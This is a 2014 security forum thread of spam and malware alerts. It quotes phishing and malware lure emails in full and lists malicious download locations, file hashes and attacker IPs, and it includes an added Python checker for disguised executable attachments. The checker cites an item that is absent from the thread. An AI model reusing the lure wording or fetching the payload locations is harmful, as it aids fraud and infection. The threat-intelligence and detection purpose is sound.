UDP communications
137.170.185.211: https://www.virustotal.com/en/ip-address/137.170.185.211/information/
___

Fake Invoice SPAM
- http://myonlinesecurity.co.uk/peter-hogarth-sons-ltd-invoice-642555-fake-pdf-malware/
22 Sep 2014 - "'PETER HOGARTH & SONS LTD Invoice 642555' pretending to come from john.williamson@ peterhogarth .co.uk is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
Please find attached your Invoice(s)/Credit(s)
PETER HOGARTH & SONS LTD
INDUSTRIAL HYGIENE and PROTECTION
Tel: 01472 345726 | Fax: 01472 250272 | Web...
Estate Road No. 5, South Humberside Industrial Estate, Grimsby, North East Lincolnshire, DN31 2UR
Peter Hogarth & Sons Ltd is a company registered in England.
Company Registration Number: 1143352...

22 September 2014: Attachment.zip (230 kb): Extracts to: Invoice 77261990001.PDF.exe
Current Virus total detections: 3/53*. This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en-gb/file/809f5007e7e771dbb791d08e166770b17c2de15908b300ef1a241ac9f23215d3/analysis/1411380202/
___

European banks / Europol in cybercrime fightback
- http://www.reuters.com/article/2014/09/22/banks-cybersecurity-europe-idUSL6N0RN1WO20140922
Sep 22, 2014 - "Europe's banks have joined forces with Europol's cybercrime unit to try to combat the rising and increasingly sophisticated threat being posed by cyber criminals to financial firms. The European Banking Federation (EBF), which represents about 4,500 banks, and Europol's European Cybercrime Centre - known as EC3 - said on Monday they had signed a memorandum of understanding to intensify cooperation between law enforcement and the financial sector. Banks are facing frequent attacks from sophisticated hackers. Wall Street bank JP Morgan said last month it was working with U.S. law enforcement authorities to investigate a possible cyber attack, and Royal Bank of Scotland and its UK peers have suffered serious attacks by hackers that have disrupted systems... Cybercrime attacks faced by banks include coordinated attempts to disrupt websites, payment card fraud, and attempts to infiltrate systems to steal money. The agreement between the EBF, which is a federation of 32 national banking lobby groups, and EC3, which links cybercrime divisions of police forces in EU countries, will allow them to exchange know-how, statistics and strategic information. Banks are typically working closely with national police forces to fight cybercrime, and the new agreement should widen that across Europe..."

:mad: :fear:

AplusWebMaster
2014-09-23, 13:48
FYI...

Fake 'Voice Mail' SPAM
- http://blog.dynamoo.com/2014/09/according-to-this-spam-you-have-new.html
23 Sep 2014 - "This strangely titled spam leads to malware.
From: Voice Mail
Date: 23 September 2014 10:17
Subject: You have a new voice
You are receiving this message because we were unable to deliver it, voice message did not go through because the voicemail was unavailable at that moment.
* The reference number for this message is _qvs8213783583_001
The transmission length was 78
Receiving machine ID : R8KU-UY0G3-ONGH
To download and listen your voice mail please follow the link ...
The link to this secure message will expire in 24 hours ...

The link in the email downloads a file from www .ezysoft .in/ocjnvzulsx/VoiceMail.zip which contains a malicious executable VoiceMail.scr which has a VirusTotal detection rate of 2/54*. According to this Anubis report** the malware attempts to phone home to very-english .co.uk which might be worth blocking."
* https://www.virustotal.com/en-gb/file/2008078314022b0bf08cc1e2a23420ec4f7caab95e00e020ecf07b7c01dbfa35/analysis/1411464313/

** http://anubis.iseclab.org/?action=result&task_id=1ac4290d6f92ed1044d41585aeff6b27a&format=html

- http://myonlinesecurity.co.uk/new-voice-fake-pdf-malware/
23 Sep 2014 - "... 23 Sep 2014: VoiceMail.zip (9kb): Extracts to: VoiceMail.scr Current Virus total detections: 2/54*
* https://www.virustotal.com/en-gb/file/2008078314022b0bf08cc1e2a23420ec4f7caab95e00e020ecf07b7c01dbfa35/analysis/1411464313/
___

jQuery.com compromised to serve malware via drive-by download
- http://www.net-security.org/malware_news.php?id=2869
23.09.2014 - "jQuery.com, the official website of the popular cross-platform JavaScript library of the same name, had been compromised and had been -redirecting- visitors to a website hosting the RIG exploit kit and, ultimately, delivering information-stealing malware. While any website compromise is dangerous for users, this one is particularly disconcerting because of the demographic of its users... The attack was first detected on September 18, and given that the malicious redirector was hosted on a domain that was registered on the same day, it's more than likely that that was the day when the attack actually started. RiskIQ researchers* have immediately notified the jQuery Foundation about the compromise, and the site's administrators have -removed- the malicious script. The bad news is that they still don't know how the compromise happened, so it just might happen again. Users who have visited the site on or around September 18 are advised to check whether they have been compromised by the malware. The researchers recommend immediately re-imaging the system, resetting passwords for user accounts that have been used on it, and checking whether suspicious activity has originated from it (data exfiltration, etc.). The only good news in all of this is that there is no indication that the jQuery library was affected."
* http://www.riskiq.com/resources/blog/jquerycom-malware-attack-puts-privileged-enterprise-it-accounts-risk

>> https://blog.malwarebytes.org/?s=RIG+exploit+kit

- https://isc.sans.edu/diary.html?storyid=18699
2014-09-23

46.182.31.77: https://www.virustotal.com/en/ip-address/46.182.31.77/information/
___

Nuclear Exploit Kit evolves, includes Silverlight Exploit
- http://blog.trendmicro.com/trendlabs-security-intelligence/nuclear-exploit-kit-evolves-includes-silverlight-exploit/
Sep 23, 2014 - "... We observed that the Nuclear Exploit Kit recently included the Silverlight exploit (CVE-2013-0074*) in its scope. We believe that the attackers behind the Nuclear Exploit Kit included Silverlight in its roster of targeted software for two reasons: to have an expanded attack surface and to avoid detection (as not many security solutions have detections for this particular exploit)... This particular exploit has also been used in other exploit kits, such as the Angler Exploit Kit... Microsoft has released a bulletin (Microsoft Security Bulletin MS13-022) to address the associated vulnerability... The number of exploits used by the kit has -doubled- since the start of 2014...
Timeline of exploits used by the Nuclear Exploit Kit:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2014/09/2-Nuclear-Exploit-Kit-Timeline-01.jpg
Vulnerabilities targeted by the current Nuclear Exploit Kit:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2014/09/nuclearexploit_fig4.png
... patches have already been released for the vulnerabilities targeted by the Nuclear Exploit Kit..."
* https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0074 - 9.3 (HIGH)

:mad: :fear::fear:

AplusWebMaster
2014-09-24, 13:25
FYI...

Fake BankLine SPAM
- http://blog.dynamoo.com/2014/09/you-have-received-new-secure-message.html
24 Sep 2014 - "This -fake- BankLine email leads to malware that is not currently detected by any anti-virus engine:
From: Bankline [secure.message@ bankline .com]
Date: 24 September 2014 09:59
Subject: You have received a new secure message from BankLine
You have received a secure message.
Read your secure message by following the link bellow ...
You will be prompted to open (view) the file or save (download) it to your computer. For best results, save the file first, then open it.
If you have concerns about the validity of this message, please contact the sender directly. For questions please contact the Bankline Bank Secure Email Help Desk ...
First time users - will need to register after opening the attachment...

The link in the email goes to ismashahalam .net/xyzpayohjx/ngkzoeqjjs.html which downloads an archive file from ismashahalam .net/xyzpayohjx/SecureMessage.zip. This in turn contains a malicious file SecureMessage.scr which has a VirusTotal detection rate of 0/50*. The Anubis report** shows that the malware phones home to very-english .co.uk which is worth blocking or monitoring."
* https://www.virustotal.com/en-gb/file/2ae91a34c322641a86239ab97ba8995e0e188d67ebd5e472825e53d7b53585eb/analysis/1411546325/

** https://anubis.iseclab.org/?action=result&task_id=1d5af02378c37a5b47d2e9524c46863ef&format=html

- http://myonlinesecurity.co.uk/received-new-secure-message-bankline-fake-pdf-malware/
24 Sep 2014 - "... 24 Sep 2014: SecureMessage.zip: Extracts to: SecureMessage.scr
Current Virus total detections: 7/54*..."
* https://www.virustotal.com/en/file/2ae91a34c322641a86239ab97ba8995e0e188d67ebd5e472825e53d7b53585eb/analysis/1411565004/
... Behavioural information
UDP communications
137.170.185.211: https://www.virustotal.com/en/ip-address/137.170.185.211/information/
___

Fake Voice mail SPAM
- http://myonlinesecurity.co.uk/inclarity-net-voice-message-attached-01636605058-name-unavailable-fake-wav-malware/
24 Sep 2014 - "'Voice Message Attached from 01636605058 – name unavailable' pretending to come from voicemail@ inclarity .net is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
Time: Sep 23, 2014 10:50:00 AM
Click attachment to listen to Voice Message

24 September 2014: 01636605058_20140919_105000.wav.zip: Extracts to: 01636605058_20140919_105000.wav.exe
Current Virus total detections: 12/53*
This 'Voice Message Attached from 01636605058 – name unavailable' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper wav (sound) file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/490f83b60921c80a4666ff9b546ce0a233199949d4a00a6035178fa685debbfb/analysis/1411568872/
... Behavioural information
UDP communications
137.170.185.211: https://www.virustotal.com/en/ip-address/137.170.185.211/information/
___

Fake 'overdue invoice' SPAM – malware
- http://myonlinesecurity.co.uk/reminder-overdue-invoice-malware/
24 Sep 2014 - "'Reminder of overdue invoice' pretending to come from a random name at a random company and with a random named attachment is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... different subjects with this one having different numbers including:
Reminder of overdue invoice: 708872110964932
Overdue Payment: 122274492356288
Due Date E-Mail Reminder: 417785972641224
Payment reminder: 461929101577209
Past Due Reminder Letter: 199488661953143
Bills Reminder: 325332051074690
Automatic reminder: 676901889653218
Late payment: 475999033756578
Reminder: 215728756825356
The email looks like:
Hello,
This is Rex from Olympus Industrial. After a review of our records, we have found your account is past due.
Account ID: 5FCDMF9. This notice is a reminder your payment is due.
Regards,
Rex Gloeckler
Olympus Industrial...

24 September 2014: application_708872110964932_5FCDMF9.rar:
Extracts to: application_708872110964932_5FCDMF9.exe
Current Virus total detections: 3/54*. This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a file with a red £ sign instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/de2012097279e862bde5f4ffc8e649ede75400aa7c2afd6b343998c91657968f/analysis/1411570178/
... Behavioural information
TCP connections
157.56.96.53: https://www.virustotal.com/en/ip-address/157.56.96.53/information/
213.186.33.19: https://www.virustotal.com/en/ip-address/213.186.33.19/information/
95.101.0.97: https://www.virustotal.com/en/ip-address/95.101.0.97/information/
213.186.33.17: https://www.virustotal.com/en/ip-address/213.186.33.17/information/
195.60.214.11: https://www.virustotal.com/en/ip-address/195.60.214.11/information/
___

Fake AMEX Phish - 'Home Depot Security concern'
- http://myonlinesecurity.co.uk/american-express-security-concern-data-breach-home-depot-phishing/
24 Sep 2014 - "We are seeing quite a few American Express phishing attempts trying to get your American Express details. These are very well crafted and look identical to genuine American Express emails. The senders appear to be from American Express until you look carefully at the email headers. Do -not- click -any- links in these emails... Today’s version is the 'American Express – Security concern on Data breach at Home Depot' which is a change to previous versions to attempt to make it more believable and attractive for you to click the link & give your details. They are using the recent Home Depot hack and consequent fraudulent transactions* that are being taken from many victims accounts to scare you into ignoring the usual precautions and get you to give them your details:
* http://www.cnbc.com/id/102027452
Email looks like:
[ AMEX logo ]
Dear Customer: We are writing to you because we need to speak with you regarding a security concern on your account. The Home Depot recently reported that there was unauthorized access to payment data systems at its U.S. stores. American Express has put fraud controls in place and we continue to closely monitor the situation. Our records indicate that you recently used your American Express card on September 19, 2014.
We actively monitor accounts for fraud, and if we see unusual activity which may be fraud, our standard practice is to immediately contact our Card Members. There is no need to call us unless you see suspicious activity on your account.
To ensure the safety of your account , please log on to : ...
Regularly monitor your transactions online at americanexpress .com. If you notice fraudulent transactions, visit our online Inquiry and Dispute Center
Enroll in Account Alerts that notify you via email or text messages about potentially fraudulent activities.
Switch to Paperless Statements that are accessible online through your password-protected account.
Your prompt response regarding this matter is appreciated.
Sincerely,
American Express Identity Protection Team ...

Following the link in this 'American Express – Security concern on Data breach at Home Depot' or other -spoofed- emails takes you to a website that looks -exactly- like the real American Express site. You are then led through loads of steps to input a lot of private and personal information. Not only will this information enable them to clear out & use your American Express account, but also your Bank Account, Email details, webspace (if you have it). They then want enough information to completely impersonate you and your identity not only in cyberspace but in real life. Please read our How to protect yourselves page** for simple, sensible advice on how to avoid being infected or having your details stolen by this sort of socially engineered malware..."
** http://myonlinesecurity.co.uk/how-to-protect-yourself-and-tighten-security/

- http://threattrack.tumblr.com/post/98321608223/american-express-home-depot-credentials-phish
Sep 24, 2014
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/094c409ba72f53cb124310343c3a213b/tumblr_inline_ncf48aKPiQ1r6pupn.png
Tagged: AMEX, American Express, Home Depot, Credentials Phish
___

Netcraft Sep 2014 Web Server Survey
- http://news.netcraft.com/archives/2014/09/24/september-2014-web-server-survey.html
24 Sep 2014 - "In the September 2014 survey we received responses from 1,022,954,603 sites — nearly 31 million more than last month. This is the first time the survey has exceeded a -billion- websites, a milestone achievement that was unimaginable two decades ago. Netcraft's first ever survey was carried out over 19 years ago in August 1995. That survey found only 18,957 sites, although the first significant milestone of one million sites was reached in less than two years, by April 1997..."
___

Viator(dot)com - Data Compromise ...
- https://blog.malwarebytes.org/online-security/2014/09/viator-com-data-compromise-are-you-affected/
Sep 23, 2014 - "You may well be seeing an email appearing in your inbox from Viator .com, a website designed to help you find tours and trips overseas with none of the typical messing about such tasks usually involve. The emails have been sent out because it appears they had a breach* and anything up to 1.4 million customers may have been potentially impacted by the compromise...
* http://www.viator.com/about/media-center/press-releases/pr33251
Sep 19, 2014

... the bad news is that the breach took place a good few weeks ago yet we’re only just hearing about it... there doesn’t appear to have been a massive file posted online yet containing data such as PII related to the compromise... we await more information on this latest high-profile attack."
___

Malvertising campaign - involving DoubleClick and Zedo
- https://blog.malwarebytes.org/malvertising-2/2014/09/large-malvertising-campaign-under-way-involving-doubleclick-and-zedo/
Sep 18, 2014
"Update (09/19/14 9:20 AM PT): It appears that the malicious redirection has stopped. Last activity was detected by our honeypots around midnight last night, and nothing else since then. We are still monitoring the situation and will update here if necessary."

- http://arstechnica.com/security/2014/09/google-stops-malicious-advertising-campaign-that-could-have-reached-millions/
Sep 22 2014

:mad: :fear:

AplusWebMaster
2014-09-25, 15:28
FYI...

Fake Bank transfers/invoice SPAM ...
- http://blog.dynamoo.com/2014/09/malware-spam-rbs-bacs-transfer-sage.html
25 Sep 2014 - "... very aggressive spam run this morning, with at least -four- different email formats pushing the -same- malicious download.

RBS / Riley Crabtree: "BACS Transfer : Remittance for JSAG814GBP"
From: Riley Crabtree [creditdepart@ rbs .co.uk]
Date: 25 September 2014 10:58
Subject: BACS Transfer : Remittance for JSAG814GBP
We have arranged a BACS transfer to your bank for the following amount : 4946.00
Please find details at our secure link ...

Sage Account & Payroll: "Outdated Invoice"
From: Sage Account & Payroll [invoice@ sage .com]
Date: 25 September 2014 10:53
Subject: Outdated Invoice
Sage Account & Payroll
You have an outdated invoice from Sage Accounting that is ready for payment. To find out more details on this invoice, please follow the link ...
Screenshot: https://1.bp.blogspot.com/-8Mx-CTYIitE/VCPrdXzlOiI/AAAAAAAAFvA/YGCgcp8GX2s/s1600/sage2.png

Lloyds Commercial Bank: "Important - Commercial Documents"
From: Lloyds Commercial Bank [secure@ lloydsbank .com]
Date: 25 September 2014 11:36
Subject: Important - Commercial Documents
Important account documents
Reference: C400
Case number: 05363392
Please review BACs documents.
Click link below ...

NatWest Invoice: "Important - New account invoice"
From: NatWest Invoice [invoice@ natwest .com]
Date: 25 September 2014 10:28
Subject: Important - New account invoice
Your latest NatWest invoice has been uploaded for your review. If you have any questions regarding this invoice, please contact your NatWest service team at the number provided on the invoice for assistance.
To view/download your invoice please click here ...

The links in the emails go to different download locations to make it harder to block... In each case the page then prompts the victim to download the file Invoice_09252014.zip from the same directory as the html file. This ZIP file contains a malicious executable Invoice_09252014.scr which currently has a VirusTotal detection rate of 3/54*. The Anubis report shows that it phones home to ukrchina-logistics .com which is probably worth blocking or monitoring access to."
* https://www.virustotal.com/en-gb/file/1397ff56e47b642ff1f4eaaaedc3b84fc5cd7c619b25a894a57dabe62987d84c/analysis/1411638249/
... Behavioural information
DNS requests
ukrchina-logistics .com
TCP connections
188.165.198.52: https://www.virustotal.com/en-gb/ip-address/188.165.198.52/information/
91.196.0.119

- http://threattrack.tumblr.com/post/98386009528/sage-software-invoice-spam
Sep 25, 2014
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/c600697c85ad23d80119101ea06360d0/tumblr_inline_ncglljx1ql1r6pupn.png
Tagged: Sage, Upatre
___

Fake BCA SPAM - PDF malware
- http://myonlinesecurity.co.uk/bca-banking-24-09-14-fake-pdf-malware/
25 Sep 2014 - "'BCA Banking 24.09.14' pretending to come from hallsaccounts <hallsaccounts@ hallsgb .com> is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
Accounts Dept
Halls Holdings Ltd
Tel: 01743 450700
Fax: 01743 443759 ...

25 September 2014: BCA Banking 24.09.14.pdf.zip : Extracts to: BCA Banking 24.09.14.pdf.exe
Current Virus total detections: 4/53*. This BCA Banking 24.09.14 is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like an image of a barcode to try to fool you instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/cfd9d4f6fc16e6cf4f5960b5c1b3ad5724f86ec0eefd6e87ab154c4b1e156443/analysis/1411646762/
... Behavioural information
UDP communications
137.170.185.211: https://www.virustotal.com/en/ip-address/137.170.185.211/information/
___

Fake voice mail SPAM – wav malware
- http://myonlinesecurity.co.uk/outlook-received-voice-mail-fake-wav-malware/
25 Sep 2014 - "'You have received a voice mail' pretending to come from Microsoft Outlook [no-reply@ Your domain] is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
You received a voice mail : VOICE7838396453.wav (26 KB)
Caller-Id: 7838396453
Message-Id: ID9CME
Email-Id: [redacted]
This e-mail contains a voice message.
Download and extract the attachment to listen the message.
Sent by Microsoft Exchange Server

25 September 2014 VOICE7838396453.zip (56kb): Extracts to: voicemessage.scr
Current Virus total detections: 1/55*. This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper wav (sound) file instead of the .scr file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/c97b0291ac92a49293a1c8e5a9145241d2e09f9b53df8c13c70ca33701090773/analysis/1411657167/
... Behavioural information
TCP connections
23.21.52.195: https://www.virustotal.com/en/ip-address/23.21.52.195/information/
95.100.255.137: https://www.virustotal.com/en/ip-address/95.100.255.137/information/
194.150.168.70: https://www.virustotal.com/en/ip-address/194.150.168.70/information/
UDP communications
137.170.185.211: https://www.virustotal.com/en/ip-address/137.170.185.211/information/
___

Fake Gov't e-mail SCAM
- https://www.ic3.gov/media/2014/140924.aspx
Sep 24, 2014 - "Cybercriminals posing as Internet Crime Complaint Center (IC3) employees are defrauding the public. The IC3 has received complaints from victims who were receiving e-mails purported to be from the IC3... Victims report that the unsolicited e-mail sender is a representative of the IC3. The e-mails state that a criminal report was filed on the victim’s name and social security number and legal papers are pending. Scammers impersonate an IC3 employee to increase credibility and use threats of legal action to create a sense of urgency. Victims are informed they have one to two days from the date of the complaint to contact the scammers. Failure to respond to the e-mail will result in an arrest warrant issued to the victim. Some victims stated they were provided further details regarding the ‘criminal charges’ to include violations of federal banking regulations, collateral check fraud, and theft deception. Other victims claimed that their address was correct but their social security number was incorrect. Victims that requested additional information from the scammer were instructed to obtain prepaid money cards to avoid legal action. Victims have reported this -scam- in multiple states... If you receive this type of e-mail:
- Resist the pressure to act quickly.
- -Never- wire money based on a telephone request or in an e-mail, especially to an overseas location.
The IC3 -never- charges the public for filing a complaint and will -never- threaten to have them arrested if they do not respond to an e-mail..."

:fear::fear: :mad:
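The items above (and the 24 Sep items before them) all turn on the same trick: an executable named so that Windows, with "Hide extensions for known file types" on, displays it as a PDF, WAV or barcode image, sometimes inside a harmless-looking ZIP. The following is an added example, not code from this thread or from the quoted blogs (myonlinesecurity.co.uk, dynamoo). It shows what Explorer would display for such a name, and a small mail-gateway style triage that flags executables wearing a document-style name, including entries inside a ZIP wrapper. The attachment names are taken from posts in this thread; the file contents, the ZIP built in memory, and the extension sets are constructed assumptions, not the real samples.

```python
"""Triage helper for the spoofed-extension attachments described in this thread.

Added example, not code from the forum thread or the quoted blogs. It
reproduces the lure from the defender's side: the name Explorer shows when
known extensions are hidden, and a classifier that flags executables
carrying a document-style name, including those delivered inside a ZIP.
The extension sets are assumed subsets, not complete lists.
"""
import io
import zipfile
from typing import Dict, List, NamedTuple, Optional

# Extensions Windows runs on double-click (assumed subset).
EXECUTABLE_EXTS = {"exe", "scr", "com", "pif", "bat", "cmd", "js", "jse", "vbs", "vbe"}
# Document/media extensions the lures imitate (assumed subset).
DECOY_EXTS = {"pdf", "doc", "docx", "xls", "xlsx", "wav", "mp3", "jpg", "png", "txt", "htm", "html"}


class Verdict(NamedTuple):
    name: str
    suspicious: bool
    reason: str


def explorer_display_name(name: str) -> str:
    """Name as Explorer shows it with 'Hide extensions for known file types' on:
    the final extension disappears, so 'Invoice.PDF.exe' reads 'Invoice.PDF'."""
    base = name.rsplit("/", 1)[-1]
    return base.rsplit(".", 1)[0] if "." in base else base


def _decoy_in_stem(stem: str) -> Optional[str]:
    # Lures glue the decoy on with a dot (x.pdf.exe) or an underscore (x_pdf.scr).
    for decoy in DECOY_EXTS:
        if stem.endswith("." + decoy) or stem.endswith("_" + decoy):
            return decoy
    return None


def classify_name(name: str) -> Verdict:
    """Flag executable attachments and name the document type they imitate."""
    base = name.lower().rsplit("/", 1)[-1]
    if "." not in base:
        return Verdict(name, False, "no extension")
    stem, ext = base.rsplit(".", 1)
    if ext not in EXECUTABLE_EXTS:
        return Verdict(name, False, f".{ext} document")
    decoy = _decoy_in_stem(stem)
    if decoy:
        return Verdict(name, True, f"executable .{ext} disguised as .{decoy}")
    return Verdict(name, True, f"executable .{ext} attachment")


def classify_zip(data: bytes, zip_name: str) -> List[Verdict]:
    """Look inside a ZIP wrapper: the archive name is harmless, the entry is not."""
    verdicts: List[Verdict] = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            inner = classify_name(info.filename)
            verdicts.append(Verdict(f"{zip_name}:{info.filename}", inner.suspicious, inner.reason))
    return verdicts


def build_sample_zip(entries: Dict[str, bytes]) -> bytes:
    """Constructed ZIP for the demo; entry contents are placeholder bytes."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for entry_name, content in entries.items():
            zf.writestr(entry_name, content)
    return buf.getvalue()


def triage(attachments: Dict[str, bytes]) -> List[Verdict]:
    """Classify loose attachments by name and ZIP attachments by their entries."""
    results: List[Verdict] = []
    for name, data in attachments.items():
        if name.lower().endswith(".zip"):
            results.extend(classify_zip(data, name))
        else:
            results.append(classify_name(name))
    return results


# Constructed sample set using attachment names quoted in this thread;
# the bytes are placeholders, not the real files.
SAMPLE_ATTACHMENTS: Dict[str, bytes] = {
    "Attachment.zip": build_sample_zip({"Invoice 77261990001.PDF.exe": b"placeholder"}),
    "VOICE7838396453.zip": build_sample_zip({"voicemessage.scr": b"placeholder"}),
    "01636605058_20140919_105000.wav.exe": b"placeholder",
    "document7698124-86421_pdf.scr": b"placeholder",
    "id_card.pdf": b"%PDF-1.4 placeholder",
}

if __name__ == "__main__":
    for v in triage(SAMPLE_ATTACHMENTS):
        flag = "SUSPICIOUS" if v.suspicious else "ok        "
        print(f"{flag} {v.name:55} {v.reason}")
    print("Explorer shows:", explorer_display_name("Invoice 77261990001.PDF.exe"))
```

A name-based check like this only catches the spoofed-executable lures; it says nothing about a genuine PDF that carries an exploit, such as the id_card.pdf item above (tagged CVE-2013-2729), so it complements content scanning rather than replacing it. Keeping the "ok" verdicts in the output also makes it easy to spot that the ZIP itself was never the problem, only the .scr or .exe inside it.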

AplusWebMaster
2014-09-26, 14:58
FYI...

Amazon phish ...
- http://myonlinesecurity.co.uk/amazon-account-confirmation-phishing/
26 Sep 2014 - "'Account Confirmation' pretending to come from Amazon .co.uk <auto-confirm@ amazon .co.uk> is a phishing email designed to get your Amazon log in details and then your bank, credit card, address and personal details so they can imitate you and take over your accounts and clean you out...

Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2014/09/Amazon-Account-Confirmation.png

Following the link in this Amazon Account Confirmation or other spoofed emails takes you to a website that looks -exactly- like the real Amazon.co.uk site. You are then led through loads of steps to input a lot of private and personal information. Not only will this information enable them to clear out & use your Amazon account, but also your Bank Account, Email details, webspace (if you have it). They then want enough information to completely impersonate you and your identity not only in cyberspace but in real life. All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email or follow links in them ..."
___

Fake docs, voicemail, fax SPAM ...
- http://blog.dynamoo.com/2014/09/malware-spam-employee-documents.html
26 Sep 2014 - "... different types of spam to increase click through rates and now some tricky tools to prevent analysis of the malware.

Employee Documents - Internal Use
From: victimdomain
Date: 26 September 2014 09:41
Subject: Employee Documents - Internal Use
DOCUMENT NOTIFICATION, Powered by NetDocuments
DOCUMENT NAME: Employee Documents ...
Documents are encrypted in transit and store in a secure repository...

You have a new voice
From: Voice Mail [Voice.Mail@ victimdomain]
Date: 26 September 2014 09:30
Subject: You have a new voice
You are receiving this message because we were unable to deliver it, voice message did not go through because the voicemail was unavailable at that moment.
* The reference number for this message is _qvs4004011004_001
The transmission length was 26
Receiving machine ID : ES7D-ZNA1D-QF3E
To download and listen your voice mail please follow the link ...

RBS: BACS Transfer : Remittance for JSAG244GBP
From: Douglas Byers [creditdepart@ rbs .co.uk]
Date: 26 September 2014 10:12
Subject: BACS Transfer : Remittance for JSAG244GBP
We have arranged a BACS transfer to your bank for the following amount : 4596.00
Please find details at our secure link ...

New Fax
From: FAX Message [fax@victimdomain]
Date: 26 September 2014 10:26
Subject: New Fax
You have received a new fax .
Date/Time: Fri, 26 Sep 2014 16:26:36 +0700.
Your Fax message can be downloaded here ...

... The attack has evolved recently... usually these malicious links forwarded on to another site which had the malicious payload. Because all the links tended to end up at the same site, it was quite easy to block that site and foil the attack. But recently the payload is spread around many different sites making it harder to block. A new one today is that the landing page is somewhat obfuscated to make it harder to analyse, and this time the download is a plain old .scr file rather than a .zip. I've noticed that many anti-virus products are getting quite good at detecting the malicious ZIP files with a generic detection, but not the binary within. By removing the ZIP wrapper, the bad guys have given one less hook for AV engines to find... malicious binary document7698124-86421_pdf.scr is downloaded from the remote site which has a VirusTotal detection rate of 2/55*. The Anubis report shows the malware attempting to phone home to padav .com which is probably worth blocking."
* https://www.virustotal.com/en-gb/file/9819d4027893bcb20cdefc49632008e71672fb3eaefbbb0ef1b626a52dd6c6c4/analysis/1411724904/
... Behavioural information
DNS requests
padav .com (184.106.55.51)
TCP connections
188.165.198.52: https://www.virustotal.com/en-gb/ip-address/188.165.198.52/information/
184.106.55.51: https://www.virustotal.com/en-gb/ip-address/184.106.55.51/information/
UDP communications
137.170.185.211: https://www.virustotal.com/en-gb/ip-address/137.170.185.211/information/
___

Bill.com Spam
- http://threattrack.tumblr.com/post/98466527048/bill-com-spam
Sep 26, 2014 - "Subjects Seen:
Payment Details [Incident: 711935-599632]
Typical e-mail details:
We could not process your Full Payment Submission. The submission for reference ***/UT5236489 was successfully received and was not processed. Check attached copy (PDF Document) for more information.
Regards,
Bill.com Payment Operations

Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/8d0ecbce8726c0f09eda8b8e4dbc7c45/tumblr_inline_ncigloYHaW1r6pupn.png

Malicious File Name and MD5:
bill_com_Payment_Details_711935-599632.zip (02EE805D1EACD739BEF4697B26AAC847)
bill_com_payment_details_ID0000012773616632715381235.pdf.exe (AD24CD2E14DCBF199078BDBBAE4BF0CA)

Tagged: bill.com, Vawtrak
___

More Fakes - HMRC, BT, RBS SPAM
- http://blog.dynamoo.com/2014/09/malware-spam-hmrc-taxes-application.html
26 Sep 2014 - "Another bunch of spam emails, with the same payload* as this earlier spam run*.

HMRC taxes application with reference LZV9 0Q3E W5SD N3GV received
From: noreply@ taxreg .hmrc .gov.uk [noreply@ taxreg .hmrc .gov.uk]
Date: 26 September 2014 12:26
Subject: HMRC taxes application with reference LZV9 0Q3E W5SD N3GV received
The application with reference number LZV9 0Q3E W5SD N3GV submitted by you or your agent to register for HM Revenue & Customs (HMRC) taxes has been received and will now be verified. HMRC will contact you if further information is needed.
Please download/view your HMRC documents here ...

Important - BT Digital File
From: Cory Sylvester [Cory.Sylvester@ bt .com]
Date: 26 September 2014 12:51
Subject: Important - BT Digital File
Dear Customer,
This email contains your BT Digital File. Please scan attached file and reply to this email.
To download your BT Digital File please follow the link ...

RBS Bankline: Outstanding invoice
From: Bankline.Administrator@ rbs .co.uk [Bankline.Administrator@ rbs .co.uk]
To: <REDACTED>
Date: 26 September 2014 13:05
Subject: Outstanding invoice
{_BODY_TXT}
Dear [redacted],
Please find the attached copy invoice which is showing as unpaid on our ledger.
To download your invoice please click here ...

In the sample I looked at the malware page downloaded an archive document26092014-008_pdf.zip which in turn contains document26092014-008_pdf.exe which is the same payload* as earlier..."
* http://blog.dynamoo.com/2014/09/malware-spam-employee-documents.html
___

Fake Barclays SPAM – PDF malware
- http://myonlinesecurity.co.uk/barclays-transaction-complete-fake-pdf-malware/
26 Sep 2014 - "'Barclays Transaction not complete' is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
Unable to complete your most recent Transaction. Currently your transaction has a pending status.
If the transaction was made by mistake please contact our customer service.
For more details please download payment receipt ...

26 September 2014: PaymentReceipt262.zip: Extracts to: PaymentReceipt262.exe
